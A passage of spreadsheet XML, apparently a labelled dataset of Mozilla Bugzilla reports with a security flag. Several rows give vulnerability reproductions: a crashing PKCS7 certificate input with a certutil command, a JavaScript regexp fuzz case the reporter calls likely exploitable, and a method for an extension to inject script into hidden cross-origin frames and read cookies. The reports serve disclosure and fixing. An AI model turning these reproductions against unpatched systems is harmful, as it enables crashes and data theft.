    #3 0x7fdd88dc8a24 in nsHtml5StreamParserContinuation::Run() /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5StreamParser.cpp:1355
    #4 0x7fdd8a83e1fb in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/xpcom/threads/nsThread.cpp:626
    #5 0x7fdd8a782cd1 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #6 0x7fdd8a83bfec in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/xpcom/threads/nsThread.cpp:264
    #7 0x7fdd944c8926 in _pt_root /builds/slave/m-cen-l64-dbg-asan-00000000000/build/nsprpub/pr/src/pthreads/ptthread.c:204
    #8 0x43f54a in __asan::AsanThread::ThreadStart() ??:0
0x7fdd5ba3d03c is located 4 bytes to the left of 256-byte region [0x7fdd5ba3d040,0x7fdd5ba3d140)
allocated by thread T0 here:
    #0 0x43c620 in __interceptor_malloc ??:0
    #1 0x7fdd92a2c547 in moz_xmalloc /builds/slave/m-cen-l64-dbg-asan-00000000000/build/memory/mozalloc/mozalloc.cpp:54
    #2 0x7fdd88ddf7fb in operator new[](unsigned long) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/../../dist/include/mozilla/mozalloc.h:213
    #3 0x7fdd88dded1e in nsHtml5TreeBuilder::startTokenization(nsHtml5Tokenizer*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5TreeBuilder.cpp:77
    #4 0x7fdd88dc32ca in nsHtml5StreamParser::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/parser/html/nsHtml5StreamParser.cpp:880
    #5 0x7fdd89487c1c in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/uriloader/base/nsURILoader.cpp:262
    #6 0x7fdd873eaca0 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-dbg-asan-00000000000/build/netwerk/base/src/nsBaseChannel.cpp:720
.
.
.</t>
        </is>
      </c>
      <c r="X1786" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" t="n">
        <v>1735028</v>
      </c>
      <c r="B1787" t="inlineStr">
        <is>
          <t>2021-10-09 16:57:02 -0700</t>
        </is>
      </c>
      <c r="C1787" t="inlineStr">
        <is>
          <t>CERT_DecodeCertPackage() crash with empty pkcs7 sequence</t>
        </is>
      </c>
      <c r="D1787" t="inlineStr">
        <is>
          <t>2022-08-26 23:29:30 -0700</t>
        </is>
      </c>
      <c r="E1787" t="n">
        <v>1</v>
      </c>
      <c r="F1787" t="n">
        <v>1</v>
      </c>
      <c r="G1787" t="n">
        <v>3</v>
      </c>
      <c r="H1787" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1787" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1787" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1787" t="inlineStr">
        <is>
          <t>3.70</t>
        </is>
      </c>
      <c r="L1787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1787" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1787" t="inlineStr">
        <is>
          <t>[nss-fx](worse for server consumers of NSS, where availability is a more important security trait) [post-critsmash-triage] [adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q1787" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1787" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1787" t="inlineStr">
        <is>
          <t>3.73</t>
        </is>
      </c>
      <c r="T1787" t="n">
        <v>1</v>
      </c>
      <c r="U1787" t="n">
        <v>0</v>
      </c>
      <c r="V1787" t="n">
        <v>9</v>
      </c>
      <c r="W1787" t="inlineStr">
        <is>
          <t>Created attachment 9245126
nss-empty-pkcs7.der
This is similar to bug 1533216, I found another case where `CERT_DecodeCertPackage()` can fail. As far as I know, this can crash any client or server that accepts untrusted certificates because this is the standard entrypoint for getting a CERT object from some data read off the wire.
I'm surprised this wasn't caught by fuzzing, but if you put an indefinite sequence containing just a pkcs7 signedData OID, followed by a NULL or EOC or something similar, `SEC_ReadPKCS7Certs()` will dump core.
```
$ certutil -d "." -A -n test -t "p,p,p" -i nss-empty-pkcs7.der 
Segmentation fault
```</t>
        </is>
      </c>
      <c r="X1787" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" t="n">
        <v>1409449</v>
      </c>
      <c r="B1788" t="inlineStr">
        <is>
          <t>2017-10-17 09:43:28 -0700</t>
        </is>
      </c>
      <c r="C1788" t="inlineStr">
        <is>
          <t>Phishing vector via http auth of background connections</t>
        </is>
      </c>
      <c r="D1788" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:34 -0700</t>
        </is>
      </c>
      <c r="E1788" t="n">
        <v>1</v>
      </c>
      <c r="F1788" t="n">
        <v>1</v>
      </c>
      <c r="G1788" t="n">
        <v>3</v>
      </c>
      <c r="H1788" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1788" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1788" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1788" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1788" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1788" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1788" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1788" t="inlineStr">
        <is>
          <t>[reporter-external][necko-triaged][adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1788" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1788" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1788" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1788" t="n">
        <v>1</v>
      </c>
      <c r="U1788" t="n">
        <v>0</v>
      </c>
      <c r="V1788" t="n">
        <v>63</v>
      </c>
      <c r="W1788" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1408138 +++
In bug 1408183 comment 4 through bug 1408183 comment 11 Jerry describes a related but different problem. Nothing to do with 'Mixed Content', but the fact that background connections (in that example something to do with the OpenH264 plugin handling media server requests) can pop HTTP Auth. They have to go somewhere so we stick them in the currently active page. They don't get the "WARNING this isn't the top-level site" text we give for sub-resource auth because it's disconnected from the page.
Problem compounded in that case because they were http: requests and could be hijacked locally to trigger auth. The real solution would be to ignore HTTP Auth on background requests not associated with a page.</t>
        </is>
      </c>
      <c r="X1788" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" t="n">
        <v>1377551</v>
      </c>
      <c r="B1789" t="inlineStr">
        <is>
          <t>2017-06-30 13:36:42 -0700</t>
        </is>
      </c>
      <c r="C1789" t="inlineStr">
        <is>
          <t>Only change the background image for the flipped sidebar toolbar button state</t>
        </is>
      </c>
      <c r="D1789" t="inlineStr">
        <is>
          <t>2017-10-18 15:03:20 -0700</t>
        </is>
      </c>
      <c r="E1789" t="n">
        <v>1</v>
      </c>
      <c r="F1789" t="n">
        <v>1</v>
      </c>
      <c r="G1789" t="n">
        <v>2</v>
      </c>
      <c r="H1789" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1789" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1789" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1789" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1789" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1789" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1789" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1789" t="inlineStr">
        <is>
          <t>[reserve-photon-structure][LP_M1]</t>
        </is>
      </c>
      <c r="Q1789" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1789" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1789" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1789" t="n">
        <v>1</v>
      </c>
      <c r="U1789" t="n">
        <v>0</v>
      </c>
      <c r="V1789" t="n">
        <v>7</v>
      </c>
      <c r="W1789" t="inlineStr">
        <is>
          <t>Due to potential performance issues we may as well just change the background image</t>
        </is>
      </c>
      <c r="X1789" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" t="n">
        <v>1396399</v>
      </c>
      <c r="B1790" t="inlineStr">
        <is>
          <t>2017-09-03 08:39:21 -0700</t>
        </is>
      </c>
      <c r="C1790" t="inlineStr">
        <is>
          <t>An extension can XSS any domain with only the ActiveTab permission using frames</t>
        </is>
      </c>
      <c r="D1790" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:29 -0700</t>
        </is>
      </c>
      <c r="E1790" t="n">
        <v>1</v>
      </c>
      <c r="F1790" t="n">
        <v>1</v>
      </c>
      <c r="G1790" t="n">
        <v>3</v>
      </c>
      <c r="H1790" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1790" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1790" t="inlineStr">
        <is>
          <t>Compatibility</t>
        </is>
      </c>
      <c r="K1790" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L1790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1790" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1790" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1790" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1790" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1790" t="n">
        <v>1</v>
      </c>
      <c r="U1790" t="n">
        <v>0</v>
      </c>
      <c r="V1790" t="n">
        <v>105</v>
      </c>
      <c r="W1790" t="inlineStr">
        <is>
          <t>Created attachment 8904038
poc.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Build ID: 20170824053622
Steps to reproduce:
The ActiveTab permission allows an extension to only access the current tab (after the user interacted with the extension). This is to allow "extensions to fulfill a common use case, without having to give them very powerful permissions" like &lt;all_urls&gt; (quote from the documentation).
However, it was found that this permission also allows access to frames within the tab that can be of a different domain. This allows a malicious extension, that requested only a very strict permission set, to still interact with any domain:
1. The extension injects code into the tab that creates a hidden iframe to an arbitrary domain.
2. The extension then injects code into that frame creating an XSS situation. This obviously allows for many kinds of nefarious actions such as theft of information, request forgery etc.
--------------------------------------------------------------------------
To recreate:
1. Inject code that creates a hidden iframe
2. Wait for the frame to load
3. inject any script into that frame
I provide a POC extension that shows a browser action (button). When clicked, a hidden iframe to "https://example.com" is created in the current tab and the cookies for that URL are console.log()ed. 
The extension only requests activeTab yet this works regardless of the URL of the active tab.
Actual results:
The malicious code runs in all the frames in the current tab, including the iframe that was just created.
Expected results:
The activeTab should allow access to the parent frame only, and not to any inner frames. This is the behaviour in the Chrome browser.</t>
        </is>
      </c>
      <c r="X1790" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" t="n">
        <v>91702</v>
      </c>
      <c r="B1791" t="inlineStr">
        <is>
          <t>2001-07-20 16:45:40 -0700</t>
        </is>
      </c>
      <c r="C1791" t="inlineStr">
        <is>
          <t>Enable simple MAPI support in mail</t>
        </is>
      </c>
      <c r="D1791" t="inlineStr">
        <is>
          <t>2008-07-31 01:25:05 -0700</t>
        </is>
      </c>
      <c r="E1791" t="n">
        <v>1</v>
      </c>
      <c r="F1791" t="n">
        <v>1</v>
      </c>
      <c r="G1791" t="n">
        <v>3</v>
      </c>
      <c r="H1791" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1791" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1791" t="inlineStr">
        <is>
          <t>Simple MAPI</t>
        </is>
      </c>
      <c r="K1791" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1791" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1791" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1791" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1791" t="inlineStr">
        <is>
          <t>[PDT+] [ETA 10.04]</t>
        </is>
      </c>
      <c r="Q1791" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1791" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1791" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1791" t="n">
        <v>1</v>
      </c>
      <c r="U1791" t="n">
        <v>0</v>
      </c>
      <c r="V1791" t="n">
        <v>68</v>
      </c>
      <c r="W1791" t="inlineStr">
        <is>
          <t>Simple MAPI is supported in NS4.x, but not in NS6.x. 
What is simple MAPI?   "Simple MAPI (Microsoft Messaging Application Program
Interface) is a set of 12 common API calls which allow an application to send,
address, and receive messages. MAPI support can be used to allow non-messaging
applications such as spreadsheets and word processors to perform messaging
operations." ( From NS 4.x spec )
NS4.x supports these 12 common API calls such that when applications make calls
to them, it utilizes messenger to perform the mail tasks. 
Why we need simple MAPI support in NS6.x:
(1) to ensure deployment from enterprise customers.
(2) to provide convenience for individual customers.
This bug is to track and organize the development effort to enable simple MAPI
support in NS6.x. 
( NOTE: Full MAPI will not be supported.)
Scot, Jussi, Tiantian, Srilatha, Krishna, and Rajiv had a meeting this
afternoon, 7/20. 
Krishna and Srilatha will do a prototype to investigate the scope of work. Once
we are clear about the scope of work, we'll have a development plan. We'll meet
again next Tuesday, 7/24.
Here's a initial to-do list from Krishan:
"1. Simple MAPI Interface implementation is tightly integrated with Netscape 4.x
code.  So, need to check out weather all those functions and data types still
exists in 6.x code.
2. Look out for changes in the Simple MAPI specification.
3. Provide Code for all the Simple events; With Shared memory as IPC Channel.
4. Need to check error logging.
5. Need to check Response codes.
6. Little bit of XUL is need to create the Hidden Window."
The following people will provide help and consulation.
Mail: David Bienvenu ( bienvenu@netscape.com )
Compose window: Jean-Francois Ducarroz  ( ducarroz@netscape.com )
address book: Candice Huang  ( chuang@netscape.com )
XP toolkit: Daniel Matejka ( danm@netscape.com )</t>
        </is>
      </c>
      <c r="X1791" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" t="n">
        <v>610525</v>
      </c>
      <c r="B1792" t="inlineStr">
        <is>
          <t>2010-11-08 16:15:12 -0800</t>
        </is>
      </c>
      <c r="C1792" t="inlineStr">
        <is>
          <t>JavaScript-to-Java (nsISecureEnv) calls sometimes made with no JavaScript on stack</t>
        </is>
      </c>
      <c r="D1792" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1792" t="n">
        <v>1</v>
      </c>
      <c r="F1792" t="n">
        <v>1</v>
      </c>
      <c r="G1792" t="n">
        <v>6</v>
      </c>
      <c r="H1792" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1792" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1792" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1792" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1792" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1792" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1792" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1792" t="inlineStr">
        <is>
          <t>[sg:low] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1792" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1792" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1792" t="n">
        <v>1</v>
      </c>
      <c r="U1792" t="n">
        <v>0</v>
      </c>
      <c r="V1792" t="n">
        <v>19</v>
      </c>
      <c r="W1792" t="inlineStr">
        <is>
          <t>This is a problem in OJI and browser-side LiveConnect, which is
present on the current live branches (1.9.2 and 1.9.1), but no longer
on the trunk.
First some background:
nsISecureEnv is an interface implemented by OJI plugins to allow calls
to be made from JavaScript to Java (JavaScript-to-Java LiveConnect
calls).  OJI plugins (both Sun's and the JEP before version 0.9.7.4)
assume that nsISecureEnv calls will always be made with JavaScript on
the stack, because they use the current script principal's origin to
configure the Java code's security environment.
(The JEP uses nsIScriptSecurityManager::GetSubjectPrincipal() to get
the current script's principal, then calls nsIPrincipal::GetOrigin()
to get its origin.)
If by some chance there is no current script principal (if there is no
JavaScript on the stack), the JEP before version 0.9.7.4 assumed that
the Java code being called via the nsISecureEnv interface should run
with unlimited privileges.  And I suspect even the most recent
versions of Sun's OJI plugin for Windows and Linux also make this
assumption.
nsISecureEnv methods (used for JavaScript-to-Java calls) are normally
called with JavaScript on the stack.  But there's a bug in the
implementation of the nsILiveconnect API (used for Java-to-JavaScript
calls) that can cause nsISecureEnv methods to inadvertently be called
without any JavaScript on the stack.
That's this bug -- which I'll explain in more detail in my next
comment.
So this bug is potentially a security hole.  But (as I'll also explain
in a later comment) I strongly doubt there's any way to exploit it.</t>
        </is>
      </c>
      <c r="X1792" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" t="n">
        <v>679986</v>
      </c>
      <c r="B1793" t="inlineStr">
        <is>
          <t>2011-08-17 21:41:25 -0700</t>
        </is>
      </c>
      <c r="C1793" t="inlineStr">
        <is>
          <t>Assertion failure: limit &gt;= start, at jsregexpinlines.h:274 or Crash [@ QuoteString]</t>
        </is>
      </c>
      <c r="D1793" t="inlineStr">
        <is>
          <t>2013-01-14 07:48:50 -0800</t>
        </is>
      </c>
      <c r="E1793" t="n">
        <v>1</v>
      </c>
      <c r="F1793" t="n">
        <v>1</v>
      </c>
      <c r="G1793" t="n">
        <v>3</v>
      </c>
      <c r="H1793" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1793" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1793" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1793" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1793" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1793" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1793" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1793" t="inlineStr">
        <is>
          <t>[sg:high][qa-] js-triage-done wanted-standalone-js</t>
        </is>
      </c>
      <c r="Q1793" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1793" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1793" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T1793" t="n">
        <v>1</v>
      </c>
      <c r="U1793" t="n">
        <v>0</v>
      </c>
      <c r="V1793" t="n">
        <v>26</v>
      </c>
      <c r="W1793" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central (tested revision 7054f0e3e70e) when run with options "-j -m". Stepping through violates several more asserts and then crashes, the optimized build also crashes. I also verified this crash with Firefox 7.0a2 (see bp-7c8779d1-ac27-4f72-ae94-71a762110817). Test was produced by Jesse's RegExp fuzzer:
function testRegexp(res, mode, strings) {
  try { 
    re = new RegExp(res, mode);
    for (var i = 0; i &lt; strings.length; ++i) {
      var str = strings[i];
      var execResult = re.exec(str);
      uneval(execResult);
    }
  } catch(e) { 
  }
}
testRegexp("(?:\\3{0}|\\2\\1)+", "i", ["", "", "\x7F\x7F", "", "", "", "", "mmmm_mmmm_", "", ""]);
The nature of the crash and the assert make me believe that this is exploitable with high probability. Backtrace:
==29756== Invalid read of size 2
==29756==    at 0x4B8270: QuoteString(js::Sprinter*, JSString*, unsigned int) (jsopcode.cpp:780)
==29756==    by 0x4B85BB: js_QuoteString (jsopcode.cpp:844)
==29756==    by 0x520D46: js_ValueToSource(JSContext*, js::Value const&amp;) (jsstr.cpp:3489)
==29756==    by 0x42B187: array_toSource(JSContext*, unsigned int, js::Value*) (jsarray.cpp:1196)
==29756==    by 0x486659: js::Invoke(JSContext*, js::CallArgs const&amp;, js::MaybeConstruct) (jscntxtinlines.h:281)
==29756==    by 0x486C78: js::ExternalInvoke(JSContext*, js::Value const&amp;, js::Value const&amp;, unsigned int, js::Value*, js::Value*) (jsinterp.h:169)
==29756==    by 0x520DE4: js_ValueToSource(JSContext*, js::Value const&amp;) (jsstr.cpp:3507)
==29756==    by 0x520E2B: str_uneval(JSContext*, unsigned int, js::Value*) (jsstr.cpp:308)
==29756==    by 0x486659: js::Invoke(JSContext*, js::CallArgs const&amp;, js::MaybeConstruct) (jscntxtinlines.h:281)
==29756==    by 0x682099: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:4016)
==29756==    by 0x487103: js::ExternalExecute(JSContext*, JSScript*, JSObject&amp;, js::Value*) (jsinterp.cpp:912)
==29756==    by 0x4152B7: JS_ExecuteScript (jsapi.cpp:4926)
==29756==  Address 0x4200000 is not stack'd, malloc'd or (recently) free'd</t>
        </is>
      </c>
      <c r="X1793" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" t="n">
        <v>1110146</v>
      </c>
      <c r="B1794" t="inlineStr">
        <is>
          <t>2014-12-11 06:40:25 -0800</t>
        </is>
      </c>
      <c r="C1794" t="inlineStr">
        <is>
          <t>App installation fails with "Sorry, we had trouble fetching this app's data. error message"</t>
        </is>
      </c>
      <c r="D1794" t="inlineStr">
        <is>
          <t>2014-12-17 05:53:06 -0800</t>
        </is>
      </c>
      <c r="E1794" t="n">
        <v>1</v>
      </c>
      <c r="F1794" t="n">
        <v>1</v>
      </c>
      <c r="G1794" t="n">
        <v>6</v>
      </c>
      <c r="H1794" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1794" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1794" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K1794" t="inlineStr">
        <is>
          <t>Avenir</t>
        </is>
      </c>
      <c r="L1794" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1794" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1794" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1794" t="inlineStr"/>
      <c r="Q1794" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1794" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1794" t="inlineStr">
        <is>
          <t>2014-12-16</t>
        </is>
      </c>
      <c r="T1794" t="n">
        <v>1</v>
      </c>
      <c r="U1794" t="n">
        <v>0</v>
      </c>
      <c r="V1794" t="n">
        <v>7</v>
      </c>
      <c r="W1794" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Open mp-homepage popular tab: https://marketplace-dev.allizom.org/popular
2. Click the install button of any app.
Expected results:
The app can be installed.
Actual results:
The app can't be installed. "Sorry, we had trouble fetching this app's data. Please try again later."  error message is displayed.
Notes/Issues:
Issue can be reproduced in FF37(Win7 and Android) in mp-dev and mp-stage.
Screencast for this issue: http://screencast.com/t/OM2Kf3dQ</t>
        </is>
      </c>
      <c r="X1794" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" t="n">
        <v>674545</v>
      </c>
      <c r="B1795" t="inlineStr">
        <is>
          <t>2011-07-27 08:36:22 -0700</t>
        </is>
      </c>
      <c r="C1795" t="inlineStr">
        <is>
          <t>Crash with too complex regular expressions in js1_5/extensions/regress-330569.js and js1_5/extensions/regress-351448.js</t>
        </is>
      </c>
      <c r="D1795" t="inlineStr">
        <is>
          <t>2011-11-09 15:18:56 -0800</t>
        </is>
      </c>
      <c r="E1795" t="n">
        <v>1</v>
      </c>
      <c r="F1795" t="n">
        <v>1</v>
      </c>
      <c r="G1795" t="n">
        <v>3</v>
      </c>
      <c r="H1795" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1795" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1795" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1795" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1795" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1795" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1795" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1795" t="inlineStr">
        <is>
          <t>[sg:critical?], wanted-standalone-js</t>
        </is>
      </c>
      <c r="Q1795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1795" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1795" t="n">
        <v>1</v>
      </c>
      <c r="U1795" t="n">
        <v>0</v>
      </c>
      <c r="V1795" t="n">
        <v>12</v>
      </c>
      <c r="W1795" t="inlineStr">
        <is>
          <t>Created attachment 548795
330569 stack
js1_5/extensions/regress-330569.js and js1_5/extensions/regress-351448.js crash browser and shell opt and debug on 1.9.2 Linux 32 and 64 bit at least. Haven't tried others. Regressed around 2011-07-23</t>
        </is>
      </c>
      <c r="X1795" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" t="n">
        <v>1577719</v>
      </c>
      <c r="B1796" t="inlineStr">
        <is>
          <t>2019-08-30 01:51:22 -0700</t>
        </is>
      </c>
      <c r="C1796" t="inlineStr">
        <is>
          <t>stack-buffer-overflow in nr_reg_register_callback</t>
        </is>
      </c>
      <c r="D1796" t="inlineStr">
        <is>
          <t>2024-05-30 10:02:20 -0700</t>
        </is>
      </c>
      <c r="E1796" t="n">
        <v>1</v>
      </c>
      <c r="F1796" t="n">
        <v>1</v>
      </c>
      <c r="G1796" t="n">
        <v>3</v>
      </c>
      <c r="H1796" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1796" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1796" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K1796" t="inlineStr">
        <is>
          <t>70 Branch</t>
        </is>
      </c>
      <c r="L1796" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1796" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1796" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+][adv-esr68.2+]</t>
        </is>
      </c>
      <c r="Q1796" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1796" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1796" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T1796" t="n">
        <v>1</v>
      </c>
